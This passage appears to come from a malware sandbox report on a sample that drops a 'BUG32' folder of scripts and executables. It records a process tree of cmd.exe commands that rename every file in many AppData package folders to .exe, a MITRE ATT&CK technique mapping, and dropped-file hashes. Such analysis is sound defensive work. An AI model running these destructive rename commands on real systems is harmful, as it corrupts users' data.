        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCache\*.*" "*.exe"
        5⤵
        
        PID:4296
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\*.*" "*.exe"
        5⤵
        
        PID:4748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetHistory\*.*" "*.exe"
        5⤵
        
        PID:2200
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\*.*" "*.exe"
        5⤵
        
        PID:4484
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\*.*" "*.exe"
        5⤵
        
        PID:3608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\*.*" "*.exe"
        5⤵
        
        PID:4972
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\*.*" "*.exe"
        5⤵
        
        PID:4872
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\*.*" "*.exe"
        5⤵
        
        PID:1620
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\*.*" "*.exe"
        5⤵
        
        PID:1704
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\AC\*.*" "*.exe"
        5⤵
        
        PID:3216
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\AC\INetCache\*.*" "*.exe"
        5⤵
        
        PID:4736
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4120
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\AC\INetCookies\*.*" "*.exe"
        5⤵
        
        PID:4676
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\AC\INetHistory\*.*" "*.exe"
        5⤵
        
        PID:2892
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\AC\Temp\*.*" "*.exe"
        5⤵
        
        PID:980
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\*.*" "*.exe"
        5⤵
        
        PID:2960
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AppData\*.*" "*.exe"
        5⤵
        
        PID:2340
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
        5⤵
        
        PID:3604
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\LocalState\*.*" "*.exe"
        5⤵
        
        PID:1828
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
        5⤵
        
        PID:1096
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\Settings\*.*" "*.exe"
        5⤵
        
        PID:4740
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
        5⤵
        
        PID:1676
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\TempState\*.*" "*.exe"
        5⤵
        
        PID:2344
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
        5⤵
        
        PID:2200
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
        5⤵
        
        PID:1680
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
        5⤵
        
        PID:680
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
        5⤵
        
        PID:640
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC\*.*" "*.exe"
        5⤵
        
        PID:8
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AppData\*.*" "*.exe"
        5⤵
        
        PID:4244
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
        5⤵
        
        PID:1704
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\LocalState\*.*" "*.exe"
        5⤵
        
        PID:4416
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
        5⤵
        
        PID:2796
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\*.*" "*.exe"
        5⤵
        
        PID:4932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
        5⤵
        
        PID:4476
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\TempState\*.*" "*.exe"
        5⤵
        
        PID:2856
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
        5⤵
        
        PID:2960
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
        5⤵
        
        PID:2648
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
        5⤵
        
        PID:1616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
        5⤵
        
        PID:1844
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AC\*.*" "*.exe"
        5⤵
        
        PID:4800
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AppData\*.*" "*.exe"
        5⤵
        
        PID:4856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
1⤵
- Drops file in Windows directory
PID:1948

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4088

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:4784

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
1024KB

MD5
5b10af62799d4f41b2a558f02e78b7f5

SHA1
d5f7538256b3d6b9272fa910e6643a8e1c7941e7

SHA256
a976f18597cedbdd0f8591a17ab0e6fc32e35e9ab119d8df2c59945737c1f18b

SHA512
6aa151209abdfa758992a2f3b5f1f22688ea225636002f0c218e3199d15960a1e8c6ac683f0af748d79627e97d42b539327a6b774e57e01d3ae5a9c1a54c0604

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
256KB

MD5
29bd18035ac3468ed8ee41ba90d66f22

SHA1
36e76825c5aff3f599ec16a85b14ee487595a69d

SHA256
eca587e1d30a5a9c65a7f3d69272ebc2890a0ec954d1ee4ad7d5ac45bd95ddc8

SHA512
b1b8a231de045c227d430c9edd5996b882153fd848fc319ba2dfbfc7aa309bce8a3551889f735f6de6d6fdfc09a1ffad4dcb4fd7ff2d4017eeb2c97f7a83f7d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb

Filesize
68KB

MD5
6a6ec1961fbcdfca600aaa139aa99a38

SHA1
59bff8ac2cd022aba81a36a6518a37a79cb00bc3

SHA256
695bb0092f8f7b9e6f3dd39e55d56c6a12a032fabb67a97361ce8c397e3e09c9

SHA512
c48148ee33cfc7a6e80f137b51ad6b0d56f8eaca08e25e00d1be577d3099c36ba24551d4a023e122d58ebebabc870d22d3c56d74b941ab6589ac5a0793c285bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

Filesize
9KB

MD5
7050d5ae8acfbe560fa11073fef8185d

SHA1
5bc38e77ff06785fe0aec5a345c4ccd15752560e

SHA256
cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

SHA512
a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

Download Submit
C:\Users\Admin\AppData\Local\Temp\6580.tmp\6581.vbs

Filesize
513B

MD5
739efd2b7b9737d3d191e9fc5b983824

SHA1
6ad90c8406ae243fbb5ce07172447879205b525c

SHA256
1b51ef43c6e66683199c084b53b5b13d39a02ea6a94ca5f7293c7d68ba362583

SHA512
7fa6ead55103ccf506192643ce608b84969a8bda28c7bc2855907d14b6e756574258924766920ea661d68507fca772a12a652aab7c85466e0d97a444098cf59c

Download Submit
C:\Users\Admin\AppData\Local\Temp\6580.tmp\BUG32\ad.exe

Filesize
21KB

MD5
7999f942ff7190cb7c9f0e04d6dc3d41

SHA1
66c3743d7a3d0885a624600abd71486c63a52904

SHA256
8c52ba6df441fea41e87285a7a79e790773407b4d377730b4f834b067d355776

SHA512
9ea2f9e0e81b69895023da6a5e6f4850bdfb0e37d847a6086afaa3debb928673276fa149b2e8df154f6b0498191e5e7ab29c22bc415a761038435abcc4607cee

Download Submit
C:\Users\Admin\AppData\Local\Temp\6580.tmp\BUG32\admin.vbs

Filesize
182B

MD5
052bc547687f4b9136a4d21ccb9be339

SHA1
897dfc37a8d89c9fbe390f9663495a2940457100

SHA256
2b1c03ec095baa8004183d2d9dc2a42d012c22969ee9923215cf73982e4bb122

SHA512
85e9a4092ed12d426fc5903c4f576b0085b3e794060382a87b8c8c871139a7968dd43b797088e303f4583374551102e4dc064b9b1e8af4fe89ab20799a981a31

Download Submit
C:\Users\Admin\AppData\Local\Temp\6580.tmp\BUG32\bx.cur

Filesize
2KB

MD5
664a5626d7f9f5b991976b7c2fcd6176

SHA1
cafdd6179df723c7a7dcfa96a774fd2dc92ef40f

SHA256
691bbbad6b1d9b7c010cf63976e55e9c2b06ec0e9b29a7f16d8cf3b28e408cf8

SHA512
d4f1eb1dac1404219915f882aeac2544f82465d8bf84d9af0e03fa671a4f0798ca42fcd801cce9715c05a06732a03ec31189943a4a001137f3a022a4b89991b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\6580.tmp\BUG32\emptyone.vbs

Filesize
29B

MD5
9dbbdc7d01ea45c41f089d9c345b8100

SHA1
c0d429a5e3a6e729583e6bcf0599a62466ccfbe2

SHA256
9a3cfe496cf2c6b1efcba29320353194b3974ebeb49cadcbf83a72745c50fef6

SHA512
530e8dbe050c7a073ff0efbf6e117f6bf86ad856ec43b8a7faefc495f603503a6e18994d8cb778f66ad1077904f64c7189b5a2c10c8899ebb6dcaaf5c4f3461e

Download Submit
C:\Users\Admin\AppData\Local\Temp\6580.tmp\BUG32\evl.wav

Filesize
1.5MB

MD5
fae94d96ac61b8d57365151e142ed9f4

SHA1
bf9b9be54dcdadc9d8cdf427c16dc5ca9c8c28a8

SHA256
86f9017cf6f3c95a43922e5e5c58d71cbc82064a78895b531d1f5aa368ea5b63

SHA512
7b0d7026017dea8aa70975c023160e340cac7474bae5beedfb906f7378d033bb67c44b1c7085ac34ef061008ecd0cf545449e1da624c1408cda1e649ab1ca49d

Download Submit
C:\Users\Admin\AppData\Local\Temp\6580.tmp\BUG32\icon.ico

Filesize
16KB

MD5
e22ab01202357460eec9871c74e6212b

SHA1
d16c867a6a32769b1cdab2ce2e37d4d7d48570b7

SHA256
1bd0dbdbe78d8218968cf3d5f203abf52824870a39610c505e8fba695fd329bb

SHA512
9535ad5c9d4b94ec525ab643e4f0ff37868465ae892f16c3465a5c0fc49a0bdb2075053bf1948502902e04996ef7dd3b8fa7dc6b9be4cb756ddfbd76544eb507

Download Submit
C:\Users\Admin\AppData\Local\Temp\6580.tmp\BUG32\jaq.vbs

Filesize
4KB

MD5
e77aad670e295b9849a0d3d4f8501ec2

SHA1
0f0061209c15a0184bacfe87ff67c80a7283ded5

SHA256
c1ffac115387d943660d11acea27a06a920f505a0f3142969c25c9fa2e830b6f

SHA512
d2e9144a666600d407922a968ca8705f286d9b52ff43873a96a61fb39c63e11ad5d67e405cd5a95659d6309fc729b67269d19d405a9a2c9c8e18c2863515b760

Download Submit
C:\Users\Admin\AppData\Local\Temp\6580.tmp\BUG32\js.bat

Filesize
50B

MD5
faf4749b646b63a1df551fe0141727cb

SHA1
eab00a1525581a6823d7216f3ec019012bab619f

SHA256
6b2831b0c5bcac2f5f57aab8028cd486f4c6c26364a70ecc76ff71d7f710049c

SHA512
28eea78034e7b6d09a32d9985d2731ec582c232425ee4d81a52d65aa5f3618f8d463c52caa881496116c47433140e7b1c79dc6add6b88ef2650ac7ae8cbfb67a

Download Submit
C:\Users\Admin\AppData\Local\Temp\6580.tmp\BUG32\jsc.exe

Filesize
200KB

MD5
367b7179319f010f84b37acfc65082ba

SHA1
3c74537066cc79cf1505e9c79fe321b53ed3ab16

SHA256
035cc52a0abb363a463e21787dc061a3b42376ba0b082bc9c2d7e2399365862f

SHA512
d282fac9692b3ff1ab838b1a9a30727f7e166f92923503c65bca3bef85e75b300a1973d6fc1739f04f4058e743abdec29a08ecf1bda4730a02dcdaeb13749833

Download Submit
C:\Users\Admin\AppData\Local\Temp\6580.tmp\BUG32\kill.bat

Filesize
398B

MD5
9e116f6eb010b8bff3211210e5b979fe

SHA1
d81b32e7845a614a38e3902239ce978c908af8c2

SHA256
cdeabd549e74e525e1baad3252246209667967399563f8be2b3275c8c276fc3e

SHA512
fd5687206d013577577d68c65215cd4636a616b83e12e5acbae0b619e543ff06f67d3881c8c85d0e6e0ee13dd7f5e20246b9edafea26cb0d6bb39ee4362966b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\6580.tmp\BUG32\msc.wav

Filesize
344KB

MD5
77bb6c1e12d47eff938d2efb28e7fb9d

SHA1
7f4fc62fde5eb3beb6def399ab525380cc4b8965

SHA256
926e24d85e847789a62f8ae3dae7af494ff329893a9a3c133b073b4b9cddbccb

SHA512
a19afaa90822b0081d51612aea2a41992f5c4eb2f39767cf9ed96b1ffc88bbb4203b4a04e9942c2cef445866817f56802ef099ba4f034949861dd3da6c4b3b2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\6580.tmp\BUG32\nokill.bat

Filesize
81B

MD5
00cf4877a187a307971f4fd650ac8c11

SHA1
2569ed07cbe4ab78d12cba571e83e1e1a7fc59b6

SHA256
8fdd9f0aa62b3e365850970187311192f5e101768edad88b550cc39a6909bdce

SHA512
039e90e66ed5fa8cd39a7525d1b7b0eba85b32d4954a41e60a113b61d3e1fda9b2356975a587873ca54cef129a894ac19e2d1c6d59e20a182412861b1205d4b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\6580.tmp\BUG32\runner.vbs

Filesize
277B

MD5
fe18d2d82dbfb9226cc424c0164252be

SHA1
e058b9eff08e3a7370d49d78634c8c201db8f0e5

SHA256
7922e452d5166bfa8e32e9392cb3b123cffc54b03218d8fcb584f5a2d97a0b96

SHA512
6540372f658f6397eb836d979b4208c6507b4aafdb8eacce772d645cdc1f418690e50c275c0a71c305f0a9201688bbe955fb5023aff223f18c0e83e32735c996

Download Submit
C:\Users\Admin\AppData\Local\Temp\6580.tmp\BUG32\scrm.wav

Filesize
880KB

MD5
95aa92415c37bbf7e649d406f159853d

SHA1
ff37bc8b297a81e78d31e27559a9c4e1e1307275

SHA256
b9d6d86686222addc0048bdb7be1e5531a1d4b48d8d65e156e180e94035c3d02

SHA512
6efa300352e64da46d343dad5ef2d810c7ee0b07dc9b7b1b8968ef9c8a4446ed4a17064194dfc44fbe16c95972e4866eb1042e34a2528b782f0ba0ee582fafed

Download Submit
C:\Users\Admin\AppData\Local\Temp\6580.tmp\BUG32\whitescr.png

Filesize
52KB

MD5
19d522cd15cc73b932f1ab4252d9d624

SHA1
27c0f04a38af403f84e1f2dc6965206e8b3f9b73

SHA256
78c21952f543624fe51f92bc2f35b17f652e4fed695228aa530370ff05083a04

SHA512
8c43e39a8affc34743b4e1521f85f578ea2b3b6f455d20983746ec4eb1f28f6f706889ba3ed1551b9a14ab3dc9723e719a48077de9fbd06dd77ee0f41b064a9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\wmsetup.log

Filesize
1KB

MD5
6eda6b90ebc059b20d9e527eb350df73

SHA1
ea31e5a11b62ed8c414334b0bbe5106264802873

SHA256
cf6fdfad9c4eaa08c03321bc96551003ccb86cc9388a04ab16f9c234483e7202

SHA512
4a65acb21f4e1003bce2cc914aa9ca5e520c0e70abe84b22f463591fb5ae4c1e199429d121fc1b4f60b368e1420db69228dc34fa0be2a1fd589706494a7db325

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms

Filesize
934B

MD5
4c968d6116b5097ede12db505f478631

SHA1
3a7b770160e5e7d89ffcd7a36454a555174d007e

SHA256
3dd4be322ccff5b847cf0c30633cc2f6d48374aeaf2da5dc5530a226ed5e929b

SHA512
0cdb047f40240561a5177046fc6b6bfb07696cfb3c80742e92e50b2a6d2cb1c16cd44a37c5cc8bb04bb8b6f3c3e33bcbe0d1c75f45064bbd7ffc84acb63ee3b4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms

Filesize
2KB

MD5
3e429770c85c5a635834fd851efd209a

SHA1
5ea04b2d4412a2df87ed825bd1d32d94aca4e966

SHA256
a8bc48081d5ab1458789ee9f3948b4e41cbd02eb512874cd9d43c6e6b3ce6c4f

SHA512
4eadd6dec40d3e702a7259da1fdfdeeff511d86bca26824694b9713653b30d382610c4dcf9d4bf9deb7a992fdc08c4300f5adac0c88da0c7dce8244ebbb5d777

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms

Filesize
946B

MD5
020513bd05cf822a696635b8e2177966

SHA1
f83f356d7d1ef8ba3fe1ccecd37eac26c07a25a1

SHA256
976bd478030f5a2cfda905786ae7b506b23ef08ded0f288168d11cd3e18cb220

SHA512
3e570abd6be18650b8ec76590ba13a03e657d6b46a5f523a7ea9d36bab89f5d2e6801281e5e9ac1fe183841bfb02d051950ccc728467272337c6679cfc3acdc5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms

Filesize
2KB

MD5
88a8897d8a3858b041b921f3a62f919d

SHA1
c32de2366a09709d1f59d5beb98b55e268f520ba

SHA256
7a723e71c9550b8c4f44b30439068049d1d480f4e242b6fb75241b8c28ad563e

SHA512
16796971fba8c02672c51d96ad30be65a15f865fd0bfe560c283f8414355cb8639de6b5d79ae3e3ead5a8ec8c93c2aec2323eca14e0e4232314b950bfb87922d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms

Filesize
939B

MD5
969d2a170304ed57ab03c64c3723af2a

SHA1
d73421f1678157eeb090319ae24c5f9b621d0aa8

SHA256
245303f9f7aafea4ea36e76a49548a06c2ff399d4000a957c041d447b8c4706e

SHA512
770c524284022c9104886aeb7d3f9ddf725118d205831a1429f78f31e156c6ca12ba0d255ea4360ee08ad5f76a0b619a6475f7cc1065870ab92b762d25614a51

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms

Filesize
2KB

MD5
93f381b1bc4538706158c2874fc6571d

SHA1
77ea39088cc71f02f7681aa4985aab4bf724d768

SHA256
1f61b2c3adddac3d03529eae279221b2016ba5f6ae4bc6fe8182ebe5f45e3ba8

SHA512
72bddee279f9c626e4acb151afac345a4bb6cf112c5de8e10b1b9afc058f462b0701089bf6aa592b2e5cc89a5ac499b619fafbcba6fb74040adcdc1c0449111c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini

Filesize
451B

MD5
65029e5cb3a76e5e3c6f07d1f1de5431

SHA1
278eca91de7a250f3d2fc195b0f0508d3a675088

SHA256
ff66037453eaf22dab707a5092d76f95aaffb0e9693002886b7b9006411f5591

SHA512
594b5b1d1d9f453b6ed3fc59b83435fdf7d8545656fc4a0cff2686ab604e1dee8eeb0ebfe274161af8d3197c2b248339809ec2ef1d53b06cd480bfe582d43481

Download Submit
C:\bug32\list.lnk

Filesize
123KB

MD5
483cace2f36666f20cf4a651c5ed6620

SHA1
d11e9eb481b6af7bea48d9aac3d8896550a418d3

SHA256
4323a562f17e1f19caad9e171616a5076aec488a32d1fc16113e8e0b6dc0693b

SHA512
59b108a985d367b658587c3836b1e23b5e47ffab3c83deb2703411d8279e7da1137a100484b7164a29bb4dcd67e5f6dddec4f0b4bbb2fb6b97ab4472420a5b1d

Download Submit

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads